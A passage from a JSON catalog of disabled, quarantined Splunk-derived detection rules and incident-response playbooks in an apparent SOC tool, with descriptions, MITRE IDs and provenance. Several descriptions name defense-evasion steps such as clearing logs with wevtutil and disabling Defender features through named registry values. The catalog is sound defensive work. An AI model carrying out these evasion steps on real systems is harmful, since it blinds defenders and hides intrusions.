in order to clear the contents of logs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because clearing event logs can be an attempt to cover tracks after malicious actions, hindering forensic investigations. If confirmed malicious, this behavior could allow an attacker to erase evidence of their activities, making it difficult to trace their actions and understand the full scope of the compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-eventlog-cleared-via-wevtutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb829a8-db84-4832-b64b-3e964cd44f01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_eventlog_cleared_via_wevtutil.yml" } }, { "id": "splunk-security-content-fddad083-cdf5-419d-83c6-baa85e329595", "type": "detection", "name": "O365 Mail Permissioned Application Consent Granted by User", "description": "The following analytic identifies instances where a user grants consent to an application requesting mail-related permissions within the Office 365 environment. It leverages O365 audit logs, specifically focusing on events related to application permissions and user consent actions. This activity is significant as it can indicate potential security risks, such as data exfiltration or spear phishing, if malicious applications gain access. If confirmed malicious, this could lead to unauthorized data access, email forwarding, or sending malicious emails from the compromised account. Validating the legitimacy of the application and consent context is crucial to prevent data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mail-permissioned-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fddad083-cdf5-419d-83c6-baa85e329595", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mail_permissioned_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-fddf3b56-7933-11ec-98a6-acde48001122", "type": "detection", "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic detects the execution of native .NET binaries from non-standard directories within the Windows operating system.\nIt leverages Endpoint Detection and Response (EDR) telemetry, comparing process names and original file names against a predefined lookup \"is_net_windows_file\".\nThis activity is significant because adversaries may move .NET binaries to unconventional paths to evade detection and execute malicious code.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.\nAlso this analytic leverages a sub-search to enhance performance. sub-searches have limitations on the amount of data they can return. Keep this in mind if you have an extensive list of ransomware note file names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dotnet-binary-in-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fddf3b56-7933-11ec-98a6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml" } }, { "id": "splunk-security-content-fe52c280-98bd-4596-b6f6-a13bbf8ac7c6", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Compute File Hashes", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender's file hash computation by setting the EnableFileHashComputation value to 0. This detection leverages data from the Endpoint.Registry data model, focusing on changes to the specific registry path associated with Windows Defender. Disabling file hash computation can significantly impair Windows Defender's ability to detect and scan for malware, making it a critical behavior to monitor. If confirmed malicious, this activity could allow attackers to bypass Windows Defender, facilitating undetected malware execution and persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-compute-file-hashes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe52c280-98bd-4596-b6f6-a13bbf8ac7c6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml" } }, { "id": "splunk-security-content-fe5bca48-accb-11eb-a67c-acde48001122", "type": "detection", "name": "Excessive Usage Of Taskkill", "description": "The following analytic identifies excessive usage of `taskkill.exe`, a command-line utility used to terminate processes. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on instances where `taskkill.exe` is executed ten or more times within a one-minute span. This behavior is significant as adversaries often use `taskkill.exe` to disable security tools or other critical processes to evade detection. If confirmed malicious, this activity could allow attackers to bypass security defenses, maintain persistence, and further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-taskkill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe5bca48-accb-11eb-a67c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_taskkill.yml" } }, { "id": "splunk-security-content-fe6a6cc4-9e0d-4d66-bcf4-2c7f44860876", "type": "detection", "name": "Windows Default Group Policy Object Modified", "description": "The following analytic detects modifications to default Group Policy Objects (GPOs) using Event ID 5136. It monitors changes to the `Default Domain Controllers Policy` and `Default Domain Policy`, which are critical for enforcing security settings across domain controllers and all users/computers, respectively. This activity is significant because unauthorized changes to these GPOs can indicate an adversary with privileged access attempting to deploy persistence mechanisms or execute malware across the network. If confirmed malicious, such modifications could lead to widespread compromise, allowing attackers to maintain control and execute arbitrary code on numerous hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-group-policy-object-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe6a6cc4-9e0d-4d66-bcf4-2c7f44860876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_group_policy_object_modified.yml" } }, { "id": "splunk-security-content-fe7efbf7-5f82-44b9-8c33-316189ab2393", "type": "detection", "name": "Windows Firewall Rule Modification", "description": "This detection identifies instances where a Windows Firewall rule has been modified, which may indicate an attempt to alter security policies. Unauthorized modifications can weaken firewall protections, allowing malicious traffic or preventing legitimate communications. The event logs details such as the modified rule name, protocol, ports, application path, and the user responsible for the change. Security teams should monitor unexpected modifications, correlate them with related events, and investigate anomalies to prevent unauthorized access and maintain network security integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe7efbf7-5f82-44b9-8c33-316189ab2393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_modification.yml" } }, { "id": "splunk-security-content-fe9391cd-952a-4c64-8f56-727cb0d4f2d4", "type": "detection", "name": "Windows Impair Defense Change Win Defender Tracing Level", "description": "The following analytic detects modifications to the Windows registry specifically targeting the \"WppTracingLevel\" setting within Windows Defender. This detection leverages data from the Endpoint.Registry data model to identify changes in the registry path associated with Windows Defender tracing levels. Such modifications are significant as they can impair the diagnostic capabilities of Windows Defender, potentially hiding malicious activities. If confirmed malicious, this activity could allow an attacker to evade detection and maintain persistence within the environment, leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-tracing-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe9391cd-952a-4c64-8f56-727cb0d4f2d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml" } }, { "id": "splunk-security-content-fea515a4-b1d8-4cd6-80d6-e0d71397b891", "type": "detection", "name": "Kubernetes Previously Unseen Container Image Name", "description": "The following analytic identifies the creation of containerized workloads using previously unseen images in a Kubernetes cluster. It leverages process metrics from an OTEL collector and Kubernetes cluster receiver, pulled from Splunk Observability Cloud. The detection compares container image names seen in the last hour with those from the previous 30 days. This activity is significant as unfamiliar container images may introduce vulnerabilities, malware, or misconfigurations, posing threats to the cluster's integrity. If confirmed malicious, compromised images can lead to data breaches, service disruptions, unauthorized access, and potential lateral movement within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-previously-unseen-container-image-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fea515a4-b1d8-4cd6-80d6-e0d71397b891", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_previously_unseen_container_image_name.yml" } }, { "id": "splunk-security-content-fea71cf0-fa10-4ef6-9202-9682b2e0c477", "type": "detection", "name": "Linux Auditd Possible Append Cronjob Entry On Existing Cronjob File", "description": "The following analytic detects potential tampering with cronjob files on a Linux system.\nIt leverages logs from Linux Auditd, focusing on events of type PATH or CWD.\nThis activity could be significant because adversaries often use it for persistence or privilege escalation.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, this could allow attackers to execute unauthorized code automatically, leading to system compromises and unauthorized data access, thereby impacting business operations and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-append-cronjob-entry-on-existing-cronjob-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fea71cf0-fa10-4ef6-9202-9682b2e0c477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_append_cronjob_entry_on_existing_cronjob_file.yml" } }, { "id": "splunk-security-content-feb43b86-8c38-46cd-865e-20ce8a96c26c", "type": "detection", "name": "Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr", "description": "The following analytic detects the creation or modification of Windows Scheduled Tasks related to CompMgmtLauncher or Eventvwr. These legitimate system utilities, used for launching the Computer Management Console and Event Viewer, can be abused by attackers to execute malicious payloads under the guise of normal system processes. By leveraging these tasks, adversaries can establish persistence or elevate privileges without raising suspicion. This detection helps security analysts identify unusual or unauthorized scheduled tasks involving these executables, allowing for timely investigation and remediation of potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-tasks-for-compmgmtlauncher-or-eventvwr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "feb43b86-8c38-46cd-865e-20ce8a96c26c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_tasks_for_compmgmtlauncher_or_eventvwr.yml" } }, { "id": "splunk-security-content-fedb49c4-4bd7-4d42-8fd9-f8c8538c73c4", "type": "detection", "name": "Windows InProcServer32 New Outlook Form", "description": "The following analytic detects the creation or modification of registry keys associated with new Outlook form installations, potentially indicating exploitation of CVE-2024-21378. It leverages data from the Endpoint.Registry datamodel, focusing on registry paths involving InProcServer32 keys linked to Outlook forms. This activity is significant as it may signify an attempt to achieve authenticated remote code execution via malicious form objects. If confirmed malicious, this could allow an attacker to create arbitrary files and registry keys, leading to remote code execution and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-inprocserver32-new-outlook-form.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fedb49c4-4bd7-4d42-8fd9-f8c8538c73c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_inprocserver32_new_outlook_form.yml" } }, { "id": "splunk-security-content-ff56d843-57de-4a87-b726-13b145f6bf96", "type": "detection", "name": "Cisco Duo Policy Allow Old Java", "description": "The following analytic detects when a Duo policy is created or updated to allow the use of outdated Java versions, which can introduce significant\nsecurity risks. It works by searching Duo administrator activity logs for policy creation or update actions where the policy explicitly sets\n'java_remediation' to 'no remediation', indicating that no restrictions are enforced against old Java. The analytic aggregates relevant details\nsuch as the user, admin email, and action context for further investigation. Identifying this behavior is critical for a Security Operations Center\n(SOC) because allowing outdated Java can expose an organization to known vulnerabilities, malware, and exploitation techniques. Attackers or malicious\ninsiders may attempt to weaken security controls by modifying policies to permit insecure software, increasing the risk of compromise. Prompt detection\nenables SOC analysts to respond quickly, revert risky changes, and mitigate potential threats before they are exploited.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-old-java.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff56d843-57de-4a87-b726-13b145f6bf96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_old_java.yml" } }, { "id": "splunk-security-content-ff61e98c-0337-4593-a78f-72a676c56f26", "type": "detection", "name": "Suspicious DLLHost no Command Line Arguments", "description": "The following analytic detects instances of DLLHost.exe executing without command line arguments. This behavior is unusual and often associated with malicious activities, such as those performed by Cobalt Strike. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because DLLHost.exe typically requires arguments to function correctly, and its absence may indicate an attempt to evade detection. If confirmed malicious, this could lead to unauthorized actions like credential dumping or file manipulation, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-dllhost-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff61e98c-0337-4593-a78f-72a676c56f26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-ff86077c-9212-11eb-a1e6-acde48001122", "type": "detection", "name": "Disabling CMD Application", "description": "The following analytic detects modifications to the registry that disable the CMD prompt application. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableCMD\" registry value. This activity is significant because disabling CMD can hinder an analyst's ability to investigate and remediate threats, a tactic often used by malware such as RATs, Trojans, or Worms. If confirmed malicious, this could prevent security teams from using CMD for directory and file traversal, complicating incident response and allowing the attacker to maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-cmd-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff86077c-9212-11eb-a1e6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_cmd_application.yml" } }, { "id": "splunk-security-content-ffd5e001-2e34-48f4-97a2-26dc4bb08178", "type": "detection", "name": "Detect Remote Access Software Usage Process", "description": "The following analytic detects the execution of known remote access software within the environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes mapped to the Endpoint data model. We then compare with with a list of known remote access software shipped as a lookup file - remote_access_software. This activity is significant as adversaries often use remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer to maintain unauthorized access. If confirmed malicious, this could allow attackers to control systems remotely, exfiltrate data, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffd5e001-2e34-48f4-97a2-26dc4bb08178", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_process.yml" } }, { "id": "splunk-security-content-ffd99aea-542f-448e-b737-091c1b417274", "type": "detection", "name": "Windows Impair Defense Disable Realtime Signature Delivery", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender real-time signature delivery feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender signature updates. This activity is significant because disabling real-time signature delivery can prevent Windows Defender from receiving timely malware definitions, reducing its effectiveness. If confirmed malicious, this action could allow attackers to bypass malware detection, leading to potential system compromise and persistent threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-realtime-signature-delivery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffd99aea-542f-448e-b737-091c1b417274", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml" } }, { "id": "splunk-security-content-ffeb7893-ff06-446f-815b-33ca73224e92", "type": "detection", "name": "Windows Registry Delete Task SD", "description": "The following analytic detects a process attempting to delete a scheduled task's Security Descriptor (SD) from the registry path of that task.\nIt leverages the Endpoint.Registry data model to identify registry actions performed by the SYSTEM user, specifically targeting deletions of the SD value.\nThis activity is significant as it may indicate an attempt to remove evidence of a scheduled task for defense evasion.\nIf confirmed malicious, it suggests an attacker with privileged access trying to hide their tracks, potentially compromising system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-delete-task-sd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffeb7893-ff06-446f-815b-33ca73224e92", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_delete_task_sd.yml" } }, { "id": "supply-chain-compromise-v1", "type": "detection", "name": "Supply Chain Compromise Response", "description": "Responds to suspected supply chain attacks including malicious package updates, compromised third-party libraries, or tampered build artifacts. Quarantines affected builds, notifies DevSecOps, and triggers a software inventory audit.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "supply-chain", "devops", "sca", "build-security", "oss" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/supply-chain-compromise.yaml" }, { "id": "suspicious-signin-response-v1", "type": "detection", "name": "Suspicious Sign-In Response", "description": "Responds to suspicious sign-in events including impossible travel, new country logins, known bad IP addresses, or sign-ins outside business hours. Triggers step-up authentication or session termination based on risk score.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "sign-in", "identity", "authentication", "impossible-travel", "conditional-access" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/suspicious-signin-response.yaml" }, { "id": "token-theft-response-v1", "type": "detection", "name": "Authentication Token Theft Response", "description": "Responds to stolen authentication token usage including JWT hijacking, session cookie theft, and bearer token replay attacks. Revokes tokens, forces re-authentication, and checks for downstream unauthorized access.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "token-theft", "identity", "jwt", "session-hijacking", "authentication" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/token-theft-response.yaml" }, { "id": "web-application-attack-v1", "type": "detection", "name": "Web Application Attack Response", "description": "Responds to web application attacks including SQL injection, XSS, RCE, and directory traversal. Blocks attacking IPs, captures forensic evidence, checks for data exfiltration, and notifies the AppSec team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "web", "appsec", "waf", "sqli", "xss", "rce" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/web-application-attack.yaml" }, { "id": "anomalous-data-transfer-response-v1", "type": "playbook", "name": "Anomalous Data Transfer: DLP / Exfiltration Response", "description": "Triggered by a DLP or UEBA alert detecting an anomalously large or out-of-policy data transfer, potential exfiltration to external destination, or sensitive data leaving the organization. Correlates evidence, blocks destination if malicious, and disables the user if compromise is confirmed.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "data-exfiltration", "dlp", "ueba", "anomalous-data", "insider-threat" ], "severity": "critical", "trigger": "alert", "steps": 11, "category": "anomalous-data", "mitre_techniques": [ "T1041", "T1048", "T1567" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/anomalous-data/anomalous-data-transfer-response.playbook.json" }, { "id": "ato-credential-stuffing-v1", "type": "playbook", "name": "ATO: Credential Stuffing \u2014 Block & Reset", "description": "Triggered by high-volume failed logins from a single source. Blocks the IP range, identifies impacted users, and forces resets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity" ], "severity": "critical", "trigger": "alert", "steps": 7, "category": "account-takeover", "mitre_techniques": [ "T1110.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-credential-stuffing.playbook.json" }, { "id": "ato-impossible-travel-block-v1", "type": "playbook", "name": "ATO: Impossible Travel \u2014 Block & Reset", "description": "Triggered by impossible-travel detections. Blocks the source IP, force-revokes active sessions for the user, and requires human approval before forcing a password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "account-takeover", "mitre_techniques": [ "T1078" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-impossible-travel-block.playbook.json" }, { "id": "ato-mfa-fatigue-response-v1", "type": "playbook", "name": "ATO: MFA Fatigue \u2014 Challenge & Reset", "description": "Triggered when a user receives an unusual burst of MFA prompts. Enforces step-up auth and resets MFA factors after approval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "mfa" ], "severity": "high", "trigger": "alert", "steps": 7, "category": "account-takeover", "mitre_techniques": [ "T1621" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-mfa-fatigue-response.playbook.json" }, { "id": "ato-session-token-theft-v1", "type": "playbook", "name": "ATO: Session Token Theft \u2014 Revoke & Isolate", "description": "Triggered when an authenticated session is observed from a new device + new geo simultaneously. Revokes all tokens and isolates the originating endpoint if known.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "session-hijack" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "account-takeover", "mitre_techniques": [ "T1539" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-session-token-theft.playbook.json" }, { "id": "ato-suspicious-oauth-grant-v1", "type": "playbook", "name": "ATO: Suspicious OAuth Grant \u2014 Revoke & Investigate", "description": "Triggered when a user grants a new OAuth scope to an unfamiliar third-party app. Revokes the grant and investigates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "oauth" ], "severity": "high", "trigger": "alert", "steps": 5, "category": "account-takeover", "mitre_techniques": [ "T1528" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-suspicious-oauth-grant.playbook.json" }, { "id": "bec-conditional-access-bypass-v1", "type": "playbook", "name": "BEC: Conditional Access Policy Bypass", "description": "Triggered when a BEC-related sign-in succeeds from a region that should be blocked by Conditional Access. Restores policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "identity", "conditional-access" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "bec", "mitre_techniques": [], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-conditional-access-bypass.playbook.json" }, { "id": "bec-impersonation-domain-v1", "type": "playbook", "name": "BEC: Impersonation Domain Quarantine", "description": "Triggered when an inbound email originates from a domain that look-alikes an executive or vendor. Quarantines and blocks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "email" ], "severity": "high", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1656" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-impersonation-domain.playbook.json" }, { "id": "bec-inbox-rule-malicious-v1", "type": "playbook", "name": "BEC: Malicious Inbox Rule Removed", "description": "Triggered when a forwarding/filter rule is created that hides vendor or finance keywords. Removes the rule and resets creds.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "email" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1564.008" ], "verified": true, "source": "core", "tier": 